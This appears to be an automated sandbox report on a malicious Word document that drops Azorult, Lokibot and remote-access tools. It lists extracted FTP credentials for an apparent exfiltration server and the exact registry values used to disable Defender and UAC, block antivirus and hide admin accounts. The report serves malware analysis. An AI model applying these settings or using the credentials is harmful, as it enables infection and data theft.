Analysis
-
max time kernel
1800s -
max time network
1802s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
20-05-2024 08:02
Static task
static1
Behavioral task
behavioral1
Sample
Boendet.docx
Resource
win10v2004-20240426-en
General
-
Target
Boendet.docx
-
Size
21.7MB
-
MD5
14b980a65c7501e12ccfecd9bf55cb16
-
SHA1
7bf794b9b674f5946eadb8e07a01d6aaeb337d7f
-
SHA256
a91345c766f145d47d6deb90c3ae9d920f28101e12e39d93e88e3612eaf07329
-
SHA512
a6758a6617f420ac3a49bbfbb055f43a2d5fbfa3611030e359d6ff788b7276f4c005a0e04c9cbc776dcf02e0ddc30b6bb55d1c8758b1822ad6e3cc612a54a504
-
SSDEEP
393216:9/K/AmXAr22JMg1Ml30SRiGHVdrc5nw0DxTceN+ujRIT++9kkG:4/Ar2XRiSdrc5w0DxTb3RITBeN
Malware Config
Extracted
Protocol: ftp- Host:
109.248.203.81 - Port:
21 - Username:
alex - Password:
easypassword
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Processes:
Azorult.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Azorult.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
taskhostw.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhostw.exe -
Processes:
regedit.exeAzorult.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe -
Processes:
regedit.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
Processes:
Azorult.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" Azorult.exe Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" Azorult.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" Azorult.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
cmd.exeAzorult.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Azorult.exe -
Modifies Windows Firewall 2 TTPs 23 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 4700 netsh.exe 1176 netsh.exe 372 netsh.exe 3112 netsh.exe 3128 netsh.exe 3484 netsh.exe 6620 netsh.exe 2664 netsh.exe 5848 netsh.exe 1012 netsh.exe 1176 netsh.exe 3960 netsh.exe 2180 netsh.exe 5856 netsh.exe 5356 netsh.exe 4592 netsh.exe 5676 netsh.exe 2132 netsh.exe 5544 netsh.exe 2856 netsh.exe 5544 netsh.exe 1724 netsh.exe 3952 netsh.exe -
Office macro that triggers on suspicious action 2 IoCs
Office document macro which triggers in special circumstances - often malicious.
Processes:
resource yara_rule C:\Users\Admin\Downloads\metrofax.doc office_macro_on_action C:\Users\Admin\AppData\Roaming\Microsoft\Word\AutoRecovery save of fygbf.asd office_macro_on_action -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
RDPWInst.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exepid process 6856 attrib.exe 6872 attrib.exe 6888 attrib.exe -
Checks computer location settings 2 TTPs 16 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
firefox.exefirefox.exeWScript.exetaskhost.exeAzorult.exetor-browser-windows-x86_64-portable-13.0.15.exefirefox.exewini.exewinlogon.exefirefox.exewinlog.execmd.exeWScript.execheat.exeR8.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation firefox.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation firefox.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation taskhost.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation Azorult.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation tor-browser-windows-x86_64-portable-13.0.15.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation firefox.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation wini.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation winlogon.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation firefox.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation winlog.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation cheat.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation R8.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 64 IoCs
Processes:
aurera+OTC+install.exeaurera+OTC+install.tmpaurera_dx.exeaurera_dx.exeaurera_dx-1716192337.exetor-browser-windows-x86_64-portable-13.0.15.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exetor.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exelyrebird.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exetor.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exeLokibot.exeAzorult.exewini.exewinit.exerutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exepid process 2660 aurera+OTC+install.exe 1768 aurera+OTC+install.tmp 2812 aurera_dx.exe 648 aurera_dx.exe 4380 aurera_dx-1716192337.exe 3864 tor-browser-windows-x86_64-portable-13.0.15.exe 1184 firefox.exe 1392 firefox.exe 4116 firefox.exe 1116 firefox.exe 2472 firefox.exe 1784 tor.exe 3672 firefox.exe 5044 firefox.exe 1660 firefox.exe 3860 firefox.exe 1944 firefox.exe 5500 lyrebird.exe 3908 firefox.exe 4184 firefox.exe 5556 firefox.exe 5204 firefox.exe 5072 firefox.exe 1824 firefox.exe 6008 firefox.exe 5428 firefox.exe 5108 firefox.exe 5644 firefox.exe 3088 firefox.exe 332 firefox.exe 5996 firefox.exe 5868 firefox.exe 3492 firefox.exe 2216 firefox.exe 1744 firefox.exe 6136 firefox.exe 4132 firefox.exe 2288 firefox.exe 4688 firefox.exe 5888 firefox.exe 180 tor.exe 5808 firefox.exe 5584 firefox.exe 5356 firefox.exe 5332 firefox.exe 2056 firefox.exe 2968 firefox.exe 856 firefox.exe 2124 firefox.exe 2716 firefox.exe 5896 firefox.exe 1140 firefox.exe 1692 firefox.exe 4276 firefox.exe 5812 firefox.exe 5884 Lokibot.exe 1580 Azorult.exe 3112 wini.exe 5840 winit.exe 3316 rutserv.exe 5924 rutserv.exe 4476 rutserv.exe 1556 rutserv.exe 5304 rfusclient.exe -
Loads dropped DLL 64 IoCs
Processes:
aurera_dx.exeaurera_dx.exeaurera_dx-1716192337.exetor-browser-windows-x86_64-portable-13.0.15.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exepid process 2812 aurera_dx.exe 2812 aurera_dx.exe 2812 aurera_dx.exe 648 aurera_dx.exe 648 aurera_dx.exe 4380 aurera_dx-1716192337.exe 4380 aurera_dx-1716192337.exe 4380 aurera_dx-1716192337.exe 3864 tor-browser-windows-x86_64-portable-13.0.15.exe 3864 tor-browser-windows-x86_64-portable-13.0.15.exe 3864 tor-browser-windows-x86_64-portable-13.0.15.exe 1184 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 1116 firefox.exe 1116 firefox.exe 1116 firefox.exe 1116 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 3672 firefox.exe 3672 firefox.exe 3672 firefox.exe 3672 firefox.exe 1116 firefox.exe 2472 firefox.exe 1116 firefox.exe 2472 firefox.exe 3672 firefox.exe 3672 firefox.exe 5044 firefox.exe 5044 firefox.exe 5044 firefox.exe 5044 firefox.exe 5044 firefox.exe 5044 firefox.exe 1660 firefox.exe 1660 firefox.exe 1660 firefox.exe 1660 firefox.exe 3860 firefox.exe 3860 firefox.exe 3860 firefox.exe 3860 firefox.exe 1944 firefox.exe 1944 firefox.exe 1944 firefox.exe 1944 firefox.exe 1660 firefox.exe -
Modifies file permissions 1 TTPs 62 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1416 icacls.exe 1028 icacls.exe 2416 icacls.exe 1820 icacls.exe 5944 icacls.exe 2528 icacls.exe 2728 icacls.exe 660 icacls.exe 2012 icacls.exe 2376 icacls.exe 3340 icacls.exe 4284 icacls.exe 5388 icacls.exe 1524 icacls.exe 5852 icacls.exe 5408 icacls.exe 5880 icacls.exe 2760 icacls.exe 3792 icacls.exe 352 icacls.exe 5840 icacls.exe 1848 icacls.exe 2984 icacls.exe 1104 icacls.exe 1676 icacls.exe 4220 icacls.exe 5124 icacls.exe 3268 icacls.exe 2184 icacls.exe 4200 icacls.exe 5572 icacls.exe 3776 icacls.exe 3932 icacls.exe 3840 icacls.exe 2124 icacls.exe 4884 icacls.exe 3212 icacls.exe 5292 icacls.exe 3212 icacls.exe 5132 icacls.exe 3620 icacls.exe 1264 icacls.exe 628 icacls.exe 5892 icacls.exe 2980 icacls.exe 5900 icacls.exe 2400 icacls.exe 3128 icacls.exe 8 icacls.exe 4448 icacls.exe 3408 icacls.exe 3408 icacls.exe 5132 icacls.exe 2600 icacls.exe 5772 icacls.exe 5560 icacls.exe 5852 icacls.exe 4368 icacls.exe 2760 icacls.exe 2984 icacls.exe 4492 icacls.exe 1196 icacls.exe -
Obfuscated with Agile.Net obfuscator 2 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral1/memory/5884-4855-0x0000000002CE0000-0x0000000002CF4000-memory.dmp agile_net behavioral1/memory/2416-5055-0x0000000000A90000-0x0000000000AA4000-memory.dmp agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\ProgramData\Microsoft\Intel\winlogon.exe upx behavioral1/memory/2888-5116-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/2888-5144-0x0000000000400000-0x0000000000419000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\aut1157.tmp upx behavioral1/memory/1572-5186-0x0000000000A30000-0x0000000000B1C000-memory.dmp upx behavioral1/memory/1572-5192-0x0000000000A30000-0x0000000000B1C000-memory.dmp upx -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
Lokibot.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Lokibot.exe Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Lokibot.exe Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Lokibot.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
taskhostw.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe -
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 671 4676 msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Azorult.exefirefox.exefirefox.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA firefox.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA firefox.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs
Processes:
flow ioc 545 raw.githubusercontent.com 562 raw.githubusercontent.com 759 iplogger.org 769 raw.githubusercontent.com 796 camo.githubusercontent.com 109 raw.githubusercontent.com 543 raw.githubusercontent.com 754 raw.githubusercontent.com 755 raw.githubusercontent.com 758 iplogger.org 785 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 747 ip-api.com -
Modifies WinLogon 2 TTPs 7 IoCs
Processes:
Azorult.exeRDPWInst.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe -
AutoIT Executable 5 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\Downloads\Azorult.exe autoit_exe C:\ProgramData\Windows\winit.exe autoit_exe C:\ProgramData\Microsoft\Intel\taskhost.exe autoit_exe behavioral1/memory/1572-5186-0x0000000000A30000-0x0000000000B1C000-memory.dmp autoit_exe behavioral1/memory/1572-5192-0x0000000000A30000-0x0000000000B1C000-memory.dmp autoit_exe -
Drops file in System32 directory 5 IoCs
Processes:
powershell.exeRDPWInst.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini powershell.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI powershell.exe File created C:\Windows\System32\rfxvmt.dll RDPWInst.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Lokibot.exeLokibot.exedescription pid process target process PID 5884 set thread context of 4684 5884 Lokibot.exe Lokibot.exe PID 1044 set thread context of 6720 1044 Lokibot.exe Lokibot.exe -
Drops file in Program Files directory 27 IoCs
Processes:
Azorult.exeRDPWInst.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Program Files\ByteFence Azorult.exe File opened for modification C:\Program Files\SpyHunter Azorult.exe File opened for modification C:\Program Files (x86)\Cezurity Azorult.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab Azorult.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll attrib.exe File opened for modification C:\Program Files (x86)\Zaxar Azorult.exe File opened for modification C:\Program Files (x86)\SpyHunter Azorult.exe File opened for modification C:\Program Files\COMODO Azorult.exe File opened for modification C:\Program Files\Enigma Software Group Azorult.exe File created C:\Program Files\Common Files\System\iediagcmd.exe Azorult.exe File opened for modification C:\Program Files\AVAST Software Azorult.exe File opened for modification C:\Program Files\AVG Azorult.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus Azorult.exe File opened for modification C:\Program Files\ESET Azorult.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini attrib.exe File opened for modification C:\Program Files (x86)\Microsoft JDX Azorult.exe File opened for modification C:\Program Files (x86)\AVAST Software Azorult.exe File opened for modification C:\Program Files (x86)\AVG Azorult.exe File opened for modification C:\Program Files\Common Files\McAfee Azorult.exe File opened for modification C:\Program Files\Malwarebytes Azorult.exe File opened for modification C:\Program Files\RDP Wrapper attrib.exe File opened for modification C:\Program Files (x86)\360 Azorult.exe File opened for modification C:\Program Files\Kaspersky Lab Azorult.exe File opened for modification C:\Program Files\Cezurity Azorult.exe File opened for modification C:\Program Files (x86)\Panda Security Azorult.exe -
Drops file in Windows directory 1 IoCs
Processes:
mspaint.exedescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe -
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 6116 sc.exe 1576 sc.exe 4588 sc.exe 5420 sc.exe 5352 sc.exe 1936 sc.exe 3304 sc.exe 2132 sc.exe 4808 sc.exe 5312 sc.exe 4188 sc.exe 2288 sc.exe 5896 sc.exe 3356 sc.exe 5220 sc.exe 3312 sc.exe 5644 sc.exe 5572 sc.exe 1716 sc.exe 1896 sc.exe 644 sc.exe 5408 sc.exe 1312 sc.exe 4856 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 31 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exeAcroRd32.exeAcroRd32.exeAcroRd32.exeWINWORD.EXEfirefox.exeWINWORD.EXEaurera_dx-1716192337.exeWINWORD.EXEwinit.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString aurera_dx-1716192337.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key value queried 